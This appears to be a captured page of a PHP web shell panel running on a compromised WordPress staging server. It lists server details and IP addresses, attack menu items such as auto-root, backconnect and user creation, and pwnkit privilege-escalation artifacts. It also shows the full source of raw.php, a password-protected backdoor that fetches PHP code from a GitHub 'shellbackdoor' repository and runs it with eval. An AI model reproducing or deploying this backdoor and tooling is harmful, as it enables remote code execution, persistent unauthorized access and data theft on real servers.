Linux quad-clini-stageVM 5.4.0-1109-azure #115~18.04.1-Ubuntu SMP Mon May 22 20:06:37 UTC 2023 x86_64
Apache/2.4.29 (Ubuntu)
: 10.2.0.4 | : 52.14.140.108
Cant Read [ /etc/named.conf ]
7.4.25
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
stagequad /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
wp-admin
[ DIR ]
drwxrwxrwx
wp-content
[ DIR ]
drwxrwxrwx
wp-includes
[ DIR ]
drwxrwxrwx
.htaccess
371
B
-rwxrwxrwx
.mad-root
0
B
-rw-r--r--
adminer.php
465.43
KB
-rw-r--r--
index.php
405
B
-rwxrwxrwx
license.txt
19.45
KB
-rwxrwxrwx
pwnkit
10.99
KB
-rwxr-xr-x
quadbbk28012022.zip
128.59
MB
-rw-r--r--
raw.php
2.45
KB
-rw-r--r--
readme.html
7.17
KB
-rwxrwxrwx
stagequaddb_05may2023.sql
36.11
MB
-rw-r--r--
wp-activate.php
7
KB
-rwxrwxrwx
wp-blog-header.php
351
B
-rwxrwxrwx
wp-comments-post.php
2.27
KB
-rwxrwxrwx
wp-config.php
2.92
KB
-rwxrwxrwx
wp-cron.php
3.85
KB
-rwxrwxrwx
wp-links-opml.php
2.44
KB
-rwxrwxrwx
wp-load.php
3.81
KB
-rwxrwxrwx
wp-login.php
44.4
KB
-rwxrwxrwx
wp-mail.php
8.26
KB
-rwxrwxrwx
wp-settings.php
21.77
KB
-rwxrwxrwx
wp-signup.php
30.95
KB
-rwxrwxrwx
wp-trackback.php
4.7
KB
-rwxrwxrwx
xmlrpc.php
3.16
KB
-rwxrwxrwx
Delete
Unzip
Zip
${this.title}
Close
Code Editor : raw.php
<?php // Function to check if the user is logged in based on the presence of a valid cookie function is_logged_in() { return isset($_COOKIE['user_id']) && $_COOKIE['user_id'] === 'user123'; // Ganti 'user123' dengan nilai yang sesuai } // Check if the user is logged in before executing the content if (is_logged_in()) { // Function to get URL content (similar to your previous code) function geturlsinfo($url) { if (function_exists('curl_exec')) { $conn = curl_init($url); curl_setopt($conn, CURLOPT_RETURNTRANSFER, 1); curl_setopt($conn, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($conn, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0"); curl_setopt($conn, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($conn, CURLOPT_SSL_VERIFYHOST, 0); $url_get_contents_data = curl_exec($conn); curl_close($conn); } elseif (function_exists('file_get_contents')) { $url_get_contents_data = file_get_contents($url); } elseif (function_exists('fopen') && function_exists('stream_get_contents')) { $handle = fopen($url, "r"); $url_get_contents_data = stream_get_contents($handle); fclose($handle); } else { $url_get_contents_data = false; } return $url_get_contents_data; } $a = geturlsinfo('https://raw.githubusercontent.com/Outsiders289/shellbackdoor/main/lo.php'); eval('?>' . $a); } else { // Display login form if not logged in if (isset($_POST['password'])) { $entered_password = $_POST['password']; $hashed_password = '9c5b3082eae2c54711bb99f361f58073'; // Replace this with your MD5 hashed password if (md5($entered_password) === $hashed_password) { // Password is correct, set a cookie to indicate login setcookie('user_id', 'user123', time() + 3600, '/'); // Ganti 'user123' dengan nilai yang sesuai } else { // Password is incorrect echo "Incorrect password. Please try again."; } } ?> <!DOCTYPE html> <html> <head> <title>SEMPAK BAPAKMU</title> </head> <body> <form method="POST" action=""> <label for="password">Admin:</label> <input type="password" id="password" name="password"> <input type="submit" value="Login"> </form> </body> </html> <?php } ?>
Close